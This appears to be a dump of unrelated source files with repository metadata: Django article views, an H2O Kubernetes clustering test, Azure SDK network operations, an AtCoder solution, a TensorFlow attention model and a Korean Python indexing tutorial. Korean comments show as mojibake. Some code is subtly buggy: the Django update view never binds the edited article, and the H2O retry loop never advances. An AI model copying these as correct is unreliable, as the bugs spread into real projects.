6028ec0837d82763699b394753bc8459206e12af | 8b2ff2f65b8bc55d1a4643e29cc6f30d6cba5688 | /live/django_form/articles/views.py | 425af1be08ecd3ce793270e9b42caa24c3d60822 | [] | no_license | chloe-codes1/Django | a177161a89b3f3592b04c5711246847d4f0dd32f | 496d7219d7f9aa7269d160f46f2efa4b9bf07431 | refs/heads/master | 2023-08-07T21:27:34.523326 | 2023-05-27T13:10:22 | 2023-05-27T13:10:22 | 250,606,673 | 0 | 1 | null | 2023-09-04T08:49:57 | 2020-03-27T17:57:34 | Python | UTF-8 | Python | false | false | 1,759 | py | from django.shortcuts import render, redirect, get_object_or_404
from django.views.decorators.http import require_POST
from .models import Article
from .forms import ArticleForm
# Create your views here.
def index(request):
articles = Article.objects.order_by('-pk')
context = {
'articles': articles
}
return render(request, 'articles/index.html', context)
def create(request):
if request.method == 'POST':
# POST /articles/new -> (๊ตฌ) create() ํจ์
form = ArticleForm(request.POST)
# ๊ฒ์ฆํ๊ธฐ
if form.is_valid():
article = form.save()
# -> article์ Article instance๋ฅผ return ํจ
return redirect('articles:index')
else:
# GET /articles/new
form = ArticleForm()
# ๊ณต์ฉ context
context = {
'form': form
}
return render(request, 'articles/form.html', context)
def detail(request, pk):
article = get_object_or_404(Article, id=pk)
context = {
'article': article
}
return render(request, 'articles/detail.html', context)
@require_POST
def delete(request,pk):
article = get_object_or_404(Article, id=pk)
article.delete()
return redirect('articles:index')
def update(request, pk):
article = get_object_or_404(Article, id=pk)
if request.method == 'POST':
form =ArticleForm(request.POST)
if form.is_valid():
article = form.save()
return redirect('articles:detail', article.pk)
else:
# ์์ ์์๋ ํด๋น article instance๋ฅผ ๋๊ฒจ์ค์ผ ํ๋ค!
form = ArticleForm(instance=article)
context = {
'form':form
}
return render(request, 'articles/form.html', context) | [
"[email protected]"
] | |
b8f094584d71326d60fc7d0ae1dc6345b4a8c508 | db12b990924703cd74748d8585cd9c11fafa6746 | /h2o-k8s/tests/clustering/assisted-clustering.py | 7a76ab10eaba664de63a610c5d9aaabf790e4cb0 | [
"Apache-2.0"
] | permissive | h2oai/h2o-3 | 919019a8f297eec676011a9cfd2cc2d97891ce14 | d817ab90c8c47f6787604a0b9639b66234158228 | refs/heads/master | 2023-08-17T18:50:17.732191 | 2023-08-17T16:44:42 | 2023-08-17T16:44:42 | 17,371,412 | 6,872 | 2,345 | Apache-2.0 | 2023-09-14T18:05:40 | 2014-03-03T16:08:07 | Jupyter Notebook | UTF-8 | Python | false | false | 7,324 | py | import requests
import argparse
import sys
import os
import time
from kubernetes import client, config, watch
def wait_deployment_ready(deployment_name: str, namespace: str) -> client.V1Deployment:
"""
Waits until a deployment of given name is reported to be in status `Ready` by Kubernetes.
A deployment is ready once all it's underlying pods are ready. This means there is H2O running inside each pod,
and the clustering REST API is listening for an incoming flatfile.
:param deployment_name: Name of the H2O deployment to find the correct H2O deployment
:param namespace: Namespace the deployment belongs to.
:return: An instance of V1Deployment, if found.
"""
print("Waiting for H2O deployment to be ready")
v1_apps = client.AppsV1Api()
w = watch.Watch()
for deployment in w.stream(v1_apps.list_namespaced_deployment, namespace,
field_selector="metadata.name={}".format(deployment_name), _request_timeout=360):
deployment = deployment["object"]
status: client.V1DeploymentStatus = deployment.status
if status.ready_replicas == status.replicas:
print("H2O deployment ready")
return deployment
def create_h2o_cluster(deployment_name: str, namespace: str) -> [str]:
"""
Orchestrates the creation/clustering of an H2O cluster.
:param deployment_name: Name of the H2O deployment to find the correct H2O deployment
:param namespace: Namespace the deployment belongs to.
:return: A list of pod IPs (IPv4), each IP in a separate string.
"""
config.load_incluster_config()
print("Kubeconfig Loaded")
deployment = wait_deployment_ready(deployment_name, namespace)
print(deployment)
return cluster_deployment_pods(deployment, namespace)
def cluster_deployment_pods(deployment: client.V1Deployment, namespace: str) -> [str]:
"""
Orchestrates the clustering process of H2O nodes running inside Kubernetes pods.
The label selector key is "app" - this is dependent on the configuration of the resource.
:param deployment: H2O Deployment resource
:param namespace: Namespace of the deployment resource
:return: A list of pod IPs (IPv4) clustered, each IP in a separate string.
"""
pod_label = deployment.spec.selector.match_labels["app"];
pod_ips = get_pod_ips_by_label(pod_label, namespace)
print("Detected pod_ips: {}".format(pod_ips))
send_ips_to_pods(pod_ips)
return pod_ips
def get_deployment(deployment_name: str, namespace: str) -> client.V1Deployment:
"""
Finds H2O deployment inside Kubernetes cluster withing given namespace. Exits the process with status code one
to indicate a failed test if not found.
:param deployment_name: Name of the H2O deployment to find the correct H2O deployment
:param namespace: Namespace the deployment belongs to.
:return: An instance of V1Deployment, if found.
"""
v1_apps_api = client.AppsV1Api()
deployment = v1_apps_api.read_namespaced_deployment(deployment_name, namespace)
if deployment is None:
print("Deployment '{}' does not exist".format(deployment_name))
sys.exit(1)
else:
return deployment
def send_ips_to_pods(pod_ips):
"""
Performs actualy clustering by sending all H2O pod's ClusterIP to each of the pods in a form
of a flatfile, as defined by H2O's NetworkInit.java class.
:param pod_ips: A list of pod IPs (IPv4), each IP in a separate string.
"""
flatfile_body = ""
for i in range(len(pod_ips)):
if i == len(pod_ips) - 1:
flatfile_body += "{}:54321".format(pod_ips[i]) # no \n after last flatfile record
else:
flatfile_body += "{}:54321\n".format(pod_ips[i])
for pod_ip in pod_ips:
url = "http://{}:8080/clustering/flatfile".format(pod_ip)
headers = {"accept": "*/*",
"Content-Type": "text/plain"}
response = requests.post(url, headers=headers, data=flatfile_body)
if response.status_code != 200:
print("Unexpected response code from pod '{}'")
sys.exit(1)
def check_h2o_clustered(pod_ips):
"""
Checks each and every H2O pod identified by its Kubernetes ClusterIP reports a healthy cluster of given size.
If any node is unresponsive or reports wrong cluster status, this script is exited with status code 1.
:param pod_ips: A list of pod IPs (IPv4), each IP in a separate string.
"""
for pod_ip in pod_ips:
url = "http://{}:8080/cluster/status".format(pod_ip)
response = None
max_retries = 360
retries = 0
while retries < max_retries:
response = requests.get(url)
if response.status_code == 200:
break
time.sleep(1)
if response is None:
print("Unable to obtain /cluster/status response from pod '{}' in time.".format(pod_ip))
sys.exit(1)
response_json = response.json()
if len(response_json["unhealthy_nodes"]) > 0:
print("Unhealthy nodes detected in the cluster: {}".format(response_json["unhealthy_nodes"]))
sys.exit(1)
if len(response_json["healthy_nodes"]) != len(pod_ips):
print("Healthy cluster with less node reported by node {}. IPs: {}".format(pod_ip,
response_json[
"healthy_nodes"]))
sys.exit(1)
print("Pod {} reporting healthy cluster:\n{}".format(pod_ip, response_json))
def get_pod_ips_by_label(pod_label: str, namespace: str) -> [str]:
"""
:param pod_label: A label of the H2O Pods used in Kubernetes to filter the pods by.
:param namespace: Kubernetes namespace the pods have been deployed to.
:return: A list of pod IPs (IPv4), each IP in a separate string.
"""
v1_core_pi = client.CoreV1Api();
pods = v1_core_pi.list_namespaced_pod(watch=False, namespace=namespace, label_selector="app={}".format(pod_label),
_request_timeout=360)
pod_ips = list()
for pod in pods.items:
pod_ips.append(pod.status.pod_ip)
return pod_ips
if __name__ == '__main__':
# Performs assisted clustering on H2O Cluster inside Kubernetes.
# In order to simplify usage of this script,as it's scoped is narrowed only to h2-k8s test suite,
# it is assumed all H2O nodes run on default H2O port - 54321 and H2O pods expose that port
#
args = argparse.ArgumentParser("H2O Assisted clustering test script")
args.add_argument("deployment_name",
help="Name of the H2O Deployment in K8S. Used as a label to find the H2O pods to cluster",
metavar="L", type=str)
args.add_argument("--namespace", required=True, help="Namespace the H2O has been deployed to",
type=str)
parsed_args = args.parse_args()
print("Attempting to cluster H2O")
deployment_name, namespace = parsed_args.deployment_name, parsed_args.namespace
pod_ips = create_h2o_cluster(deployment_name, namespace)
check_h2o_clustered(pod_ips)
| [
"[email protected]"
] | |
34a8508b05c051e30a87c9cb6406fa5fa9cd3217 | 78d35bb7876a3460d4398e1cb3554b06e36c720a | /sdk/network/azure-mgmt-network/azure/mgmt/network/v2020_05_01/aio/operations/_load_balancer_outbound_rules_operations.py | 4ab8d34ddefaee388144231247b7c4e6d8cca28f | [
"MIT",
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later"
] | permissive | catchsrinivas/azure-sdk-for-python | e35f59b60318a31b3c940a7a3a07b61b28118aa5 | 596227a7738a5342274486e30489239d539b11d1 | refs/heads/main | 2023-08-27T09:08:07.986249 | 2021-11-11T11:13:35 | 2021-11-11T11:13:35 | 427,045,896 | 0 | 0 | MIT | 2021-11-11T15:14:31 | 2021-11-11T15:14:31 | null | UTF-8 | Python | false | false | 8,678 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class LoadBalancerOutboundRulesOperations:
"""LoadBalancerOutboundRulesOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2020_05_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list(
self,
resource_group_name: str,
load_balancer_name: str,
**kwargs: Any
) -> AsyncIterable["_models.LoadBalancerOutboundRuleListResult"]:
"""Gets all the outbound rules in a load balancer.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param load_balancer_name: The name of the load balancer.
:type load_balancer_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either LoadBalancerOutboundRuleListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2020_05_01.models.LoadBalancerOutboundRuleListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.LoadBalancerOutboundRuleListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-05-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'loadBalancerName': self._serialize.url("load_balancer_name", load_balancer_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('LoadBalancerOutboundRuleListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/loadBalancers/{loadBalancerName}/outboundRules'} # type: ignore
async def get(
self,
resource_group_name: str,
load_balancer_name: str,
outbound_rule_name: str,
**kwargs: Any
) -> "_models.OutboundRule":
"""Gets the specified load balancer outbound rule.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param load_balancer_name: The name of the load balancer.
:type load_balancer_name: str
:param outbound_rule_name: The name of the outbound rule.
:type outbound_rule_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: OutboundRule, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2020_05_01.models.OutboundRule
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.OutboundRule"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-05-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'loadBalancerName': self._serialize.url("load_balancer_name", load_balancer_name, 'str'),
'outboundRuleName': self._serialize.url("outbound_rule_name", outbound_rule_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('OutboundRule', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/loadBalancers/{loadBalancerName}/outboundRules/{outboundRuleName}'} # type: ignore
| [
"[email protected]"
] | |
30fd9db05df431710018b687699b91fdd66bbcdb | 850d778687e3692ab2a38d4d2227391d92c21e6b | /atcoder.jp/abc051/abc051_c/Main.py | 98d9a7d6607c0487dc39d1ee50d494f2896dd483 | [] | no_license | Valkyrja3607/AtCoder | 77e2e5e66c0e8e12bb902c35f679119c6576fad7 | 9218a50b1eb83e4498845d15d9dda41fab90ed73 | refs/heads/master | 2023-07-15T20:38:52.911301 | 2018-05-30T17:56:22 | 2018-05-30T17:56:22 | 294,980,006 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 140 | py | sx,sy,tx,ty=map(int,input().split())
x=tx-sx
y=ty-sy
print("U"*y+"R"*x+"D"*y+"L"*(x+1)+"U"*(y+1)+"R"*(x+1)+"DR"+"D"*(y+1)+"L"*(x+1)+"U")
| [
"[email protected]"
] | |
750fb27f6a170e51ac8642a895809d77abbe5c79 | 7bc54bae28eec4b735c05ac7bc40b1a8711bb381 | /src/tlm/model/horizon.py | 7be9064ed94952c7a890c3e99e51cc021bd43131 | [] | no_license | clover3/Chair | 755efd4abbd5f3f2fb59e9b1bc6e7bc070b8d05e | a2102ebf826a58efbc479181f1ebb5de21d1e49f | refs/heads/master | 2023-07-20T17:29:42.414170 | 2023-07-18T21:12:46 | 2023-07-18T21:12:46 | 157,024,916 | 0 | 0 | null | 2023-02-16T05:20:37 | 2018-11-10T21:55:29 | Python | UTF-8 | Python | false | false | 15,593 | py | from typing import List
import math
import tensorflow as tf
from models.transformer import bert_common_v2 as bc
from models.transformer.bert_common_v2 import get_shape_list2, create_attention_mask_from_size
from tlm.model import base
from tlm.model.base import mimic_pooling
from tlm.model.units import Embedding2
debug_mode = False
def init_query_key_value(num_attention_heads, attention_head_size, initializer):
query_layer = tf.keras.layers.Dense(
num_attention_heads * attention_head_size,
activation=None,
name="query",
kernel_initializer=initializer)
key_layer = tf.keras.layers.Dense(
num_attention_heads * attention_head_size,
activation=None,
name="key",
kernel_initializer=initializer)
value_layer = tf.keras.layers.Dense(
num_attention_heads * attention_head_size,
activation=None,
name="value",
kernel_initializer=initializer)
return query_layer, key_layer, value_layer
class Tensor2D:
def __init__(self, tensor_3d):
self.batch_size, self.seq_length, self.hidden_dims = get_shape_list2(tensor_3d)
self.matrix = tf.reshape(tensor_3d, [-1, self.hidden_dims])
def get_3d(self):
return tf.reshape(self.matrix, [self.batch_size, self.seq_length, -1])
def attention_layer(from_tensor: Tensor2D,
to_tensor_list: List[Tensor2D],
query_ff,
key_ff,
value_ff,
attention_mask=None,
num_attention_heads=1,
size_per_head=512,
attention_probs_dropout_prob=0.0):
def transpose_for_scores(input_tensor, batch_size, num_attention_heads,
seq_length, width):
output_tensor = tf.reshape(
input_tensor, [batch_size, seq_length, num_attention_heads, width], name="reshape_transpose_for_scores")
output_tensor = tf.transpose(a=output_tensor, perm=[0, 2, 1, 3])
return output_tensor
from_shape = get_shape_list2(from_tensor.matrix)
for to_tensor in to_tensor_list:
to_shape = get_shape_list2(to_tensor.matrix)
if len(from_shape) != len(to_shape):
raise ValueError(
"The rank of `from_tensor` must match the rank of `to_tensor`.")
# `query_layer` = [B*F, N*H]
query_layer = query_ff(from_tensor.matrix)
# `query_layer` = [B, N, F, H]
query_layer = transpose_for_scores(query_layer, from_tensor.batch_size, num_attention_heads,
from_tensor.seq_length, size_per_head)
key_layer_list = []
value_layer_list = []
for to_tensor in to_tensor_list:
# `key_layer` = [B*T, N*H]
key_layer = key_ff(to_tensor.matrix)
# `key_layer` = [B, N, T, H]
key_layer = transpose_for_scores(key_layer, to_tensor.batch_size,
num_attention_heads, to_tensor.seq_length, size_per_head)
key_layer_list.append(key_layer)
# `value_layer` = [B*T, N*H]
value_layer = value_ff(to_tensor.matrix)
# `value_layer` = [B, T, N, H]
value_layer = tf.reshape(value_layer,
[to_tensor.batch_size, to_tensor.seq_length, num_attention_heads, size_per_head],
name="value_reshape")
# `value_layer` = [B, N, T, H]
value_layer = tf.transpose(a=value_layer, perm=[0, 2, 1, 3])
value_layer_list.append(value_layer)
key_layer_all = tf.concat(key_layer_list, axis=2)
value_layer_all = tf.concat(value_layer_list, axis=2)
# Take the dot product between "query" and "key" to get the raw
# attention scores.
# `attention_scores` = [B, N, F, T]
attention_scores = tf.matmul(query_layer, key_layer_all, transpose_b=True)
attention_scores = tf.multiply(attention_scores, 1.0 / math.sqrt(float(size_per_head)))
if attention_mask is not None:
# `attention_mask` = [B, 1, F, T]
attention_mask = tf.expand_dims(attention_mask, axis=[1])
# Since attention_mask is 1.0 for positions we want to attend and 0.0 for
# masked positions, this operation will create a tensor which is 0.0 for
# positions we want to attend and -10000.0 for masked positions.
adder = (1.0 - tf.cast(attention_mask, tf.float32)) * -10000.0
# Since we are adding it to the raw scores before the softmax, this is
# effectively the same as removing these entirely.
attention_scores += adder
# Normalize the attention scores to probabilities.
# `attention_probs` = [B, N, F, T]
attention_probs = tf.nn.softmax(attention_scores)
# This is actually dropping out entire tokens to attend to, which might
# seem a bit unusual, but is taken from the original Transformer paper.
# TODO restore this
# attention_probs = dropout(attention_probs, attention_probs_dropout_prob)
# `context_layer` = [B, N, F, H]
context_layer = tf.matmul(attention_probs, value_layer_all)
# `context_layer` = [B, F, N, H]
context_layer = tf.transpose(a=context_layer, perm=[0, 2, 1, 3])
# `context_layer` = [B*F, N*V]
context_layer = tf.reshape(
context_layer,
[from_tensor.batch_size * from_tensor.seq_length, num_attention_heads * size_per_head])
return context_layer
class AttentionUnit(tf.keras.layers.Layer):
def __init__(self, num_attention_heads, attention_head_size, hidden_size,
hidden_dropout_prob,
attention_probs_dropout_prob, initializer):
super(AttentionUnit, self).__init__()
query_layer, key_layer, value_layer \
= init_query_key_value(num_attention_heads, attention_head_size, initializer)
output_layer = tf.keras.layers.Dense(hidden_size, kernel_initializer=initializer)
self.num_attention_heads = num_attention_heads
self.attention_head_size = attention_head_size
self.attention_probs_dropout_prob = attention_probs_dropout_prob
self.hidden_dropout_prob = hidden_dropout_prob
self.sub_layers = {
'query': query_layer,
'key': key_layer,
'value': value_layer,
'output': output_layer
}
def __call__(self, inputs):
from_tensor, to_tensor_list, attention_mask = inputs
attention_output = attention_layer(
from_tensor=from_tensor,
to_tensor_list=to_tensor_list,
query_ff=self.sub_layers['query'],
key_ff=self.sub_layers['key'],
value_ff=self.sub_layers['value'],
attention_mask=attention_mask,
num_attention_heads=self.num_attention_heads,
size_per_head=self.attention_head_size,
attention_probs_dropout_prob=self.attention_probs_dropout_prob,
)
attention_output = self.sub_layers['output'](attention_output)
attention_output = bc.dropout(attention_output, self.hidden_dropout_prob)
attention_output = bc.layer_norm(attention_output + from_tensor.matrix)
return attention_output
class ResidualFeedforward(tf.keras.layers.Layer):
def __init__(self, hidden_size, intermediate_size, hidden_act, hidden_dropout_prob, initializer):
super(ResidualFeedforward, self).__init__()
self.intermediate_ff = bc.dense(intermediate_size, initializer,
activation=bc.get_activation(hidden_act))
self.hidden_dropout_prob = hidden_dropout_prob
self.output_ff = bc.dense(hidden_size, initializer)
def __call__(self, inputs):
intermediate_output = self.intermediate_ff(inputs)
layer_output = self.output_ff(intermediate_output)
layer_output = bc.dropout(layer_output, self.hidden_dropout_prob)
layer_output = bc.layer_norm(layer_output + inputs)
return layer_output
class ForwardColumn(tf.keras.layers.Layer):
def __init__(self, config):
super(ForwardColumn, self).__init__()
hidden_size = config.hidden_size
initializer = bc.create_initializer(config.initializer_range)
attention_head_size = int(hidden_size / config.num_attention_heads)
self.attention_head_size = attention_head_size
num_attention_heads = config.num_attention_heads
self.num_attention_heads = num_attention_heads
self.attention_probs_dropout_prob = config.attention_probs_dropout_prob
self.hidden_dropout_prob = config.hidden_dropout_prob
self.attention_unit = AttentionUnit(num_attention_heads,
attention_head_size,
hidden_size,
config.hidden_dropout_prob,
config.attention_probs_dropout_prob,
initializer)
self.residual_ff = ResidualFeedforward(hidden_size,
config.intermediate_size,
config.hidden_act,
config.hidden_dropout_prob,
initializer)
self.attention_mask = None
def __call__(self,
from_tensor: Tensor2D,
to_tensor_list: List[Tensor2D]
):
e = from_tensor, to_tensor_list, self.attention_mask
if debug_mode:
with tf.compat.v1.variable_scope("attention"):
attention_output = self.attention_unit(e)
else:
attention_output = self.attention_unit(e)
if debug_mode:
with tf.compat.v1.variable_scope("feed_forward"):
layer_output = self.residual_ff(attention_output)
else:
layer_output = self.residual_ff(attention_output)
from_tensor.matrix = layer_output
return from_tensor
def check_attention_mask(self, from_tensor, to_tensor_mask):
if self.attention_mask is None:
self.attention_mask = create_attention_mask_from_size(from_tensor.batch_size,
from_tensor.seq_length,
to_tensor_mask)
class HorizontalAlpha(base.BertModelInterface):
def __init__(self, config, is_training, use_one_hot_embeddings):
super(HorizontalAlpha, self).__init__()
if not is_training:
config.set_attrib("hidden_dropout_prob", 0.0)
config.set_attrib("attention_probs_dropout_prob", 0.0)
initializer = bc.create_initializer(config.initializer_range)
self.embedding_layer = Embedding2()
self.embedding_projector = bc.dense(config.hidden_size, initializer)
self.config = config
num_columns = config.num_columns
self.column_list = []
for tower_idx in range(num_columns):
column = ForwardColumn(config)
self.column_list.append(column)
self.num_layers = config.num_hidden_layers
self.num_columns = config.num_columns
self.num_column_tokens = config.num_column_tokens
self.column_embedding_list = []
self.use_one_hot_embeddings = use_one_hot_embeddings
self.config = config
column_mask = []
for column_idx in range(1, self.num_columns):
column_embedding = tf.Variable(lambda : initializer(shape=(self.num_column_tokens, config.hidden_size),
dtype=tf.float32),
name="column_embedding_{}".format(column_idx))
self.column_embedding_list.append(column_embedding)
column_mask += [1] * self.num_column_tokens
self.column_mask = tf.constant(column_mask)
self.all_raw_layers = []
self.all_main_layers = []
self.sequence_output = None
self.pooled_output = None
def get_column_embeddings(self, batch_size):
output = []
for column_embedding in self.column_embedding_list:
c_emb = tf.tile(tf.expand_dims(column_embedding, 0), [batch_size, 1, 1])
output.append(c_emb)
return output
def get_to_tensor_mask(self, batch_size, input_mask):
# [batch_size, seq_len + column_len]
t = tf.tile(tf.expand_dims(self.column_mask, 0), [batch_size, 1])
t = tf.concat([input_mask, t], axis=1)
return t
def embedding_projection(self, input_tensor):
if debug_mode:
with tf.compat.v1.variable_scope("embedding_projection", reuse=True):
return self.embedding_projector(input_tensor)
else:
return self.embedding_projector(input_tensor)
def forward(self, tensor_list, to_tensor_mask):
out_tensor_list = []
for column_idx, column in enumerate(self.column_list):
from_tensor = tensor_list[column_idx]
column.check_attention_mask(from_tensor, to_tensor_mask)
with tf.compat.v1.variable_scope("Column_{}".format(column_idx)):
out_tensor = column(from_tensor, tensor_list)
out_tensor_list.append(out_tensor)
return out_tensor_list
def call(self, input_ids, input_mask, segment_ids):
n_added_tokens = self.num_column_tokens * self.num_columns
input_ids = input_ids[:, :-n_added_tokens]
input_mask = input_mask[:, :-n_added_tokens]
segment_ids = segment_ids[:, :-n_added_tokens]
input_tensor = self.embedding_layer.apply(input_ids, segment_ids,
self.config.initializer_range,
self.config.vocab_size,
self.config.embedding_size,
self.config.type_vocab_size,
self.config.max_position_embeddings,
self.config.hidden_dropout_prob,
self.use_one_hot_embeddings)
self.embedding_output = input_tensor
input_tensor = self.embedding_projector(input_tensor) # [ batch_size, seq_len, hidden_dim ]
batch_size, _, _ = get_shape_list2(input_tensor)
tensor_list = [input_tensor] + self.get_column_embeddings(batch_size)
tensor_list = [Tensor2D(t) for t in tensor_list]
to_tensor_mask = self.get_to_tensor_mask(batch_size, input_mask)
for layer_no in range(self.num_layers):
with tf.compat.v1.variable_scope("layer", reuse=layer_no > 0):
tensor_list = self.forward(tensor_list, to_tensor_mask)
self.all_raw_layers.append(tensor_list)
self.all_main_layers.append(tensor_list[0])
self.embedding_table = self.embedding_layer.embedding_table
last_main_tensor = self.all_main_layers[-1]
self.sequence_output = last_main_tensor.get_3d()
self.sequence_output = tf.concat([self.sequence_output,
tf.zeros([batch_size, n_added_tokens, self.config.hidden_size])],
axis=1)
self.pooled_output = mimic_pooling(self.sequence_output, self.config.hidden_size, self.config.initializer_range)
return self.sequence_output | [
"[email protected]"
] | |
d5de6683f124bae4468b8e2827a58b7b9fde5378 | 0b514feea82eaa2e341130d9e23d13d72271d644 | /3.Python_Coding_Basic/Step_01/Unit_11-1.py | 79a6192f84771f6e99d0e62b4531770a79637d29 | [] | no_license | Jerrykim91/FromZero | f8478012130948a11978a46ab6ec7922cb354a8f | fdd5a0716b29c77019cfcd1e1eab7ed4afd1aed4 | refs/heads/master | 2022-12-25T15:04:22.656462 | 2020-10-10T14:35:06 | 2020-10-10T14:35:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,919 | py | # ์ฌ์ฉ์ ํจ์
from fun_pkg.random_num import random_num # ๋๋ค ์ซ์ ์์ฑ
# Unit_11-1.py
# ์ธ๋ฑ์ค ์ฌ์ฉํ๊ธฐ
txt_index = """
# ์ธ๋ฑ์ค ์ฌ์ฉํ๊ธฐ
=> ์ํธ์ค ๊ฐ์ฒด์ [](๋๊ดํธ)๋ฅผ ๋ถ์ด๊ณ []์์ ๊ฐ ์์์ ์ธํ
์ค๋ฅผ ์ง์ ํ๋ฉด ํด๋น ์์์ ์ ๊ทผ๊ฐ๋ฅ
- ์ํธ์ฆ ๊ฐ์ฒด์ ๋ค์ด์๋ ์์์ ์ ๊ทผํ๋ ๋ฐฉ๋ฒ์ ํ์ธ
- ์ํธ์ฆ ๊ฐ์ฒด์ ๊ฐ ์์๋ ์์๋ ์ ํด์ ธ ์์ผ๋ฉฐ ์ด ์์๋ฅผ ์ธ๋ฑ์ค๋ผ๊ณ ํจ
์ํธ์ค ๊ฐ์ฒด[์ธ๋ฑ์ค]
## ์ธ๋ฑ์ค( index, ์์ธ )
- ์์นซ๊ฐ์ ๋ปํ๋๋ฐ ๊ตญ์ด์ฌ์ ์๋ฉด์ ใฑ, ใด, ใท์ผ๋ก ํ์ํด ๋์๊ฒ๊ณผ ๋น์ท
- ์ฃผ์ ) ์ํธ์ค ๊ฐ์ฒด์ ์ธ๋ฑ์ค๋ ํญ์ 0๋ถํฐ ์์ํ๋ค๋๊ฑฐ
"""
print(txt_index)
print('-'*40)
# ์ธ๋ฑ์ค ์ฌ์ฉํ๊ธฐ - 1
a = [38,26,53,72,19]
print('-'*20)
print(a[0]) # ๋ฆฌ์คํธ์ ์ฒซ๋ฒ์งธ ์์๋ฅผ ์ถ๋ ฅ => ์ธ๋ฑ์ค 0
print('-'*20)
print(a[2]) # ๋ฆฌ์คํธ์ ์ธ๋ฒ์งธ ์์๋ฅผ ์ถ๋ ฅ => ์ธ๋ฑ์ค 3
print('-'*20)
print(a[4]) # ๋ฆฌ์คํธ์ ๋ค์ฏ๋ฒ์งธ ์์๋ฅผ ์ถ๋ ฅ => ์ธ๋ฑ์ค 4
print('-'*20)
# ํ ํ
b = (38,26,53,72,19)
print(b[2]) # ํํ์ ์ธ๋ฒ์งธ ์์๋ฅผ ์ถ๋ ฅ => ์ธ๋ฑ์ค 3
print('-'*20)
ran = range(0, 10, 2) # 0 ๋ถํฐ 10 ๊น์ง 2 ๋จ๊ณ์ฉ ์ถ๋ ฅ
r = list(ran)
print(ran[2])
print('-'*20)
print( r ) # print(ran[2])๊ฐ ์ ๋๋ก ์ถ๋ ฅ๋ ๊ฒ์ ํ์ธ๊ฐ๋ฅ
print('-'*40)
# ๋ฌธ์์ด ์ธ๋ฑ์ค
